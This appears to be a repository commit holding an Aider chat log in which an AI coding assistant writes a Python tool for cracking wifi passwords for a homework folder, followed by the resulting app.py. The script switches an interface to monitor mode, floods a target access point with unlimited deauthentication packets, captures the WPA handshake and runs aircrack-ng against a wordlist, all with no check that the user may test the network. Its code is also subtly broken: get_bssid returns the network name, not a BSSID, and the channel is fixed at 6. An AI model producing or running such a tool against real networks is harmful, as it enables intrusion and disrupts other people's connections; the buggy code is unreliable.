1cb09832a3
# Aider chat conversation:
USER: Generate a python application to assist in wifi penetration testing by prompting the user for the name of a password protected
wifi network BSSID and returning the plaintext password.
This python application should use a combination of shell tools assumed to be on the users linux system, including but not limite
d to iwconfig, airmon-ng, airodump-ng, aireplay-ng, aircrack-ng.
Operations may be run sequentially, or in parallel using multi-threading
As needed, the use of shell tools should utilize sudo capabilities
As needed, the application can change the state of the users wifi interface between managed and monitor mode
Save this to hw7/prompt0/app.py
ASSISTANT: ```python
hw7/prompt0/app.py
<<<<<<< SEARCH
=======
import subprocess
import re
import time
def change_to_monitor_mode(interface: str) -> None:
"""
Change the given interface to monitor mode.
"""
subprocess.run(["sudo", "airmon-ng", "start", interface])
def change_to_managed_mode(interface: str) -> None:
USER: ```python
hw7/prompt0/app.py
<<<<<<< SEARCH
=======
import subprocess
import re
import time
def change_to_monitor_mode(interface: str) -> None:
"""
Change the given interface to monitor mode.
"""
subprocess.run(["sudo", "airmon-ng", "start", interface])
def change_to_managed_mode(interface: str) -> None:
^^^ Incomplete SEARCH/REPLACE block.
ASSISTANT: ```python
hw7/prompt0/app.py
<<<<<<< SEARCH
=======
import subprocess
import re
import time
def change_to_monitor_mode(interface: str) -> None:
"""
Change the given interface to monitor mode.
"""
subprocess.run(["sudo", "airmon-ng", "start", interface])
def change_to_managed_mode(interface: str) -> None:
"""
Change the given interface to managed mode.
"""
subprocess.run(["sudo", "airmon-ng", "stop", interface])
def get_bssid(essid: str) -> str:
"""
Get the BSSID of the given ESSID.
"""
process = subprocess.Popen(["sudo", "iwconfig"], stdout=subprocess.PIPE)
output, error = process.communicate()
output = output.decode("utf-8")
match = re.search(r"ESSID:\"({})\"".format(essid), output)
if match:
return match.group(1)
else:
return None
def capture_handshake(bssid: str, interface: str) -> None:
"""
Capture the handshake of the given BSSID.
"""
subprocess.Popen(["sudo", "airodump-ng", "--bssid", bssid, "--channel", "6", "-w", "capture", interface], stdout=subprocess.PIPE)
time.sleep(5)
subprocess.run(["sudo", "aireplay-ng", "--deauth", "0", "-a", bssid, interface])
time.sleep(10)
subprocess.run(["sudo", "killall", "airodump-ng"])
def crack_handshake(capture_file: str, wordlist: str) -> str:
"""
Crack the handshake in the given capture file.
"""
process = subprocess.Popen(["sudo", "aircrack-ng", "-w", wordlist, capture_file], stdout=subprocess.PIPE)
output, error = process.communicate()
output = output.decode("utf-8")
match = re.search(r"KEY FOUND! \[(.*)\]", output)
if match:
return match.group(1)
else:
return None
if __name__ == "__main__":
essid = input("Enter the ESSID: ")
interface = input("Enter the interface: ")
wordlist = input("Enter the path to the wordlist: ")
change_to_monitor_mode(interface)
bssid = get_bssid(essid)
if bssid:
print(f"BSSID: {bssid}")
capture_handshake(bssid, interface)
password = crack_handshake("capture-01.cap", wordlist)
if password:
print(f"Password: {password}")
else:
print("Password not found.")
else:
print("ESSID not found.")
change_to_managed_mode(interface)
>>>>>>> REPLACE
```
72 lines
2.2 KiB
Python
72 lines
2.2 KiB
Python
import subprocess
|
|
import re
|
|
import time
|
|
|
|
def change_to_monitor_mode(interface: str) -> None:
|
|
"""
|
|
Change the given interface to monitor mode.
|
|
"""
|
|
subprocess.run(["sudo", "airmon-ng", "start", interface])
|
|
|
|
def change_to_managed_mode(interface: str) -> None:
|
|
"""
|
|
Change the given interface to managed mode.
|
|
"""
|
|
subprocess.run(["sudo", "airmon-ng", "stop", interface])
|
|
|
|
def get_bssid(essid: str) -> str:
|
|
"""
|
|
Get the BSSID of the given ESSID.
|
|
"""
|
|
process = subprocess.Popen(["sudo", "iwconfig"], stdout=subprocess.PIPE)
|
|
output, error = process.communicate()
|
|
output = output.decode("utf-8")
|
|
match = re.search(r"ESSID:\"({})\"".format(essid), output)
|
|
if match:
|
|
return match.group(1)
|
|
else:
|
|
return None
|
|
|
|
def capture_handshake(bssid: str, interface: str) -> None:
|
|
"""
|
|
Capture the handshake of the given BSSID.
|
|
"""
|
|
subprocess.Popen(["sudo", "airodump-ng", "--bssid", bssid, "--channel", "6", "-w", "capture", interface], stdout=subprocess.PIPE)
|
|
time.sleep(5)
|
|
subprocess.run(["sudo", "aireplay-ng", "--deauth", "0", "-a", bssid, interface])
|
|
time.sleep(10)
|
|
subprocess.run(["sudo", "killall", "airodump-ng"])
|
|
|
|
def crack_handshake(capture_file: str, wordlist: str) -> str:
|
|
"""
|
|
Crack the handshake in the given capture file.
|
|
"""
|
|
process = subprocess.Popen(["sudo", "aircrack-ng", "-w", wordlist, capture_file], stdout=subprocess.PIPE)
|
|
output, error = process.communicate()
|
|
output = output.decode("utf-8")
|
|
match = re.search(r"KEY FOUND! \[(.*)\]", output)
|
|
if match:
|
|
return match.group(1)
|
|
else:
|
|
return None
|
|
|
|
if __name__ == "__main__":
|
|
essid = input("Enter the ESSID: ")
|
|
interface = input("Enter the interface: ")
|
|
wordlist = input("Enter the path to the wordlist: ")
|
|
|
|
change_to_monitor_mode(interface)
|
|
bssid = get_bssid(essid)
|
|
if bssid:
|
|
print(f"BSSID: {bssid}")
|
|
capture_handshake(bssid, interface)
|
|
password = crack_handshake("capture-01.cap", wordlist)
|
|
if password:
|
|
print(f"Password: {password}")
|
|
else:
|
|
print("Password not found.")
|
|
else:
|
|
print("ESSID not found.")
|
|
|
|
change_to_managed_mode(interface)
|